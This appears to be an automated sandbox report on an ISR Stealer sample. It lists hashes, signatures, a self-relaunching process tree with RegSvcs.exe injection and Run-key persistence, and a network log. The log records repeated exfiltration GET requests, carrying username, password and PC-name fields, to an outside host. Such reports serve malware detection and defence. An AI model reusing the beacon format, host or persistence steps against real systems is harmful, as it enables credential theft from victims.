Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15/11/2020, 23:15 UTC

General

  • Target

    d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe

  • Size

    1.2MB

  • MD5

    e9fea729bae2bd3a20d61829dc12c806

  • SHA1

    d89fe8744aae2fa5164163045d6f91540cd49213

  • SHA256

    d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5

  • SHA512

    9d60873b85bb2128e35258789b7c40d3d29a8ff476272759844bb8f74fd665fb82dcbe9672e9311b0c7537d6ab1f8662ac43abe8bc7aa4b63519b03d0fb45ab3

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

  • ISR Stealer Payload 13 IoCs
  • NirSoft MailPassView 7 IoCs

    Password recovery tool for various email clients

  • Nirsoft 7 IoCs
  • Executes dropped EXE 13 IoCs
  • UPX packed file 38 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 16 IoCs
  • Adds Run key to start application 2 TTPs 26 IoCs
  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Suspicious use of SetThreadContext 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 567 IoCs
  • Suspicious use of AdjustPrivilegeToken 253 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 566 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe
    "C:\Users\Admin\AppData\Local\Temp\d265fcb40a443162e0da3274ca4a0c81418c12756b929b29f34688abddae01b5.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\cf7RAmgFQF.ini"
          4⤵
            PID:1124
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
            /scomma "C:\Users\Admin\AppData\Local\Temp\23c0n5x3l4.ini"
            4⤵
              PID:2016
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1620
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                5⤵
                • Suspicious use of SetThreadContext
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1440
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\5HEEMUkSbD.ini"
                  6⤵
                    PID:688
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                    /scomma "C:\Users\Admin\AppData\Local\Temp\f5pXjfyd35.ini"
                    6⤵
                      PID:1884
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                    5⤵
                    • Loads dropped DLL
                    PID:1572
                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:316
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                        7⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SetWindowsHookEx
                        PID:476
                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          /scomma "C:\Users\Admin\AppData\Local\Temp\VB3BJIORwL.ini"
                          8⤵
                            PID:1224
                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                            /scomma "C:\Users\Admin\AppData\Local\Temp\2wLjxQGzKE.ini"
                            8⤵
                              PID:1912
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                            7⤵
                            • Loads dropped DLL
                            PID:1884
                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                              8⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks whether UAC is enabled
                              • Suspicious use of SetThreadContext
                              PID:1148
                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                9⤵
                                • Suspicious use of SetThreadContext
                                • Suspicious use of SetWindowsHookEx
                                PID:1572
                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                  /scomma "C:\Users\Admin\AppData\Local\Temp\xlX0uAlM1X.ini"
                                  10⤵
                                    PID:1340
                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                    /scomma "C:\Users\Admin\AppData\Local\Temp\FDoTHsjGYT.ini"
                                    10⤵
                                      PID:948
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                    9⤵
                                    • Loads dropped DLL
                                    PID:1964
                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                      10⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Suspicious use of SetThreadContext
                                      PID:1928
                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                        11⤵
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2016
                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                          /scomma "C:\Users\Admin\AppData\Local\Temp\Atsta9kW8S.ini"
                                          12⤵
                                            PID:1336
                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                            /scomma "C:\Users\Admin\AppData\Local\Temp\5F1tqlOL5P.ini"
                                            12⤵
                                              PID:2044
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                            11⤵
                                            • Loads dropped DLL
                                            PID:852
                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                              12⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              PID:1708
                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                13⤵
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of SetWindowsHookEx
                                                PID:476
                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\ta3VJOn2dt.ini"
                                                  14⤵
                                                    PID:1964
                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                    /scomma "C:\Users\Admin\AppData\Local\Temp\ZwTwUTHYka.ini"
                                                    14⤵
                                                      PID:1568
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                    13⤵
                                                    • Loads dropped DLL
                                                    PID:1340
                                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                      14⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of SetThreadContext
                                                      PID:620
                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                        15⤵
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:1028
                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\kbKlLqjJcV.ini"
                                                          16⤵
                                                            PID:744
                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                            /scomma "C:\Users\Admin\AppData\Local\Temp\9LucVHGLDo.ini"
                                                            16⤵
                                                              PID:1760
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                            15⤵
                                                            • Loads dropped DLL
                                                            PID:1224
                                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                              16⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              PID:1756
                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                17⤵
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:1932
                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\H9CXmAn0p2.ini"
                                                                  18⤵
                                                                    PID:736
                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                    /scomma "C:\Users\Admin\AppData\Local\Temp\JoaRSBMfOl.ini"
                                                                    18⤵
                                                                      PID:1448
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                    17⤵
                                                                    • Loads dropped DLL
                                                                    PID:1220
                                                                    • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                      "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                      18⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1320
                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                        19⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1740
                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\3jmnzjiWSY.ini"
                                                                          20⤵
                                                                            PID:1016
                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                            /scomma "C:\Users\Admin\AppData\Local\Temp\jR3uPCfdqG.ini"
                                                                            20⤵
                                                                              PID:948
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                            19⤵
                                                                            • Loads dropped DLL
                                                                            PID:1224
                                                                            • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                              "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                              20⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Checks whether UAC is enabled
                                                                              PID:1528
                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                21⤵
                                                                                  PID:476
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                  21⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1092
                                                                                  • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                    "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                    22⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2036
                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                      23⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:1768
                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                        /scomma "C:\Users\Admin\AppData\Local\Temp\zb3JPOscSk.ini"
                                                                                        24⤵
                                                                                          PID:320
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                          /scomma "C:\Users\Admin\AppData\Local\Temp\aNlIjieAmy.ini"
                                                                                          24⤵
                                                                                            PID:1160
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                          23⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1188
                                                                                          • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                            "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                            24⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:1584
                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                              25⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1928
                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                /scomma "C:\Users\Admin\AppData\Local\Temp\4VwvmfrBBD.ini"
                                                                                                26⤵
                                                                                                  PID:880
                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\5Rwhlv6Tot.ini"
                                                                                                  26⤵
                                                                                                    PID:1832
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\e9h2a4n\run.vbs"
                                                                                                  25⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1212
                                                                                                  • C:\Users\Admin\e9h2a4n\eYmFqcBd.exe
                                                                                                    "C:\Users\Admin\e9h2a4n\eYmFqcBd.exe" CTHiXWASNE.ELH
                                                                                                    26⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1516
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                      27⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:1968
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                        /scomma "C:\Users\Admin\AppData\Local\Temp\M45z4RchMZ.ini"
                                                                                                        28⤵
                                                                                                          PID:1604

                                                  Network

                                                  • flag-unknown
                                                    DNS
                                                    www.maga.site88.net
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    www.maga.site88.net
                                                    IN A
                                                    Response
                                                    www.maga.site88.net
                                                    IN A
                                                    153.92.0.100
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:38:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    DNS
                                                    www.000webhost.com
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    www.000webhost.com
                                                    IN A
                                                    Response
                                                    www.000webhost.com
                                                    IN A
                                                    104.18.107.8
                                                    www.000webhost.com
                                                    IN A
                                                    104.18.108.8
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:28 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Set-Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108; expires=Wed, 16-Dec-20 00:38:28 GMT; path=/; domain=.000webhost.com; HttpOnly; SameSite=Lax
                                                    cf-request-id: 067016380600001e7910237000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d2639ae691e79-AMS
                                                  • flag-unknown
                                                    DNS
                                                    www.download.windowsupdate.com
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    www.download.windowsupdate.com
                                                    IN A
                                                    Response
                                                    www.download.windowsupdate.com
                                                    IN CNAME
                                                    wu-fg-shim.trafficmanager.net
                                                    wu-fg-shim.trafficmanager.net
                                                    IN CNAME
                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                    IN CNAME
                                                    wu.azureedge.net
                                                    wu.azureedge.net
                                                    IN CNAME
                                                    wu.ec.azureedge.net
                                                    wu.ec.azureedge.net
                                                    IN CNAME
                                                    wu.wpc.apr-52dd2.edgecastdns.net
                                                    wu.wpc.apr-52dd2.edgecastdns.net
                                                    IN CNAME
                                                    hlb.apr-52dd2-0.edgecastdns.net
                                                    hlb.apr-52dd2-0.edgecastdns.net
                                                    IN CNAME
                                                    cs11.wpc.v0cdn.net
                                                    cs11.wpc.v0cdn.net
                                                    IN A
                                                    72.21.81.240
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:38:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:41 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 0670166c2700001e8124a9c000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d268d0a271e81-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:38:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:38:54 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 0670169d3f0000fa146226f000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d26db9c9ffa14-AMS
                                                  • flag-unknown
                                                    DNS
                                                    crl.verisign.com
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    crl.verisign.com
                                                    IN A
                                                    Response
                                                    crl.verisign.com
                                                    IN CNAME
                                                    crl-symcprod.digicert.com
                                                    crl-symcprod.digicert.com
                                                    IN CNAME
                                                    cs9.wac.phicdn.net
                                                    cs9.wac.phicdn.net
                                                    IN A
                                                    93.184.220.29
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:06 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:06 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 067016cf770000fa24ad39d000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d272bffe0fa24-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:19 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 06701700ff00000c0de3910000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d277b3e690c0d-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
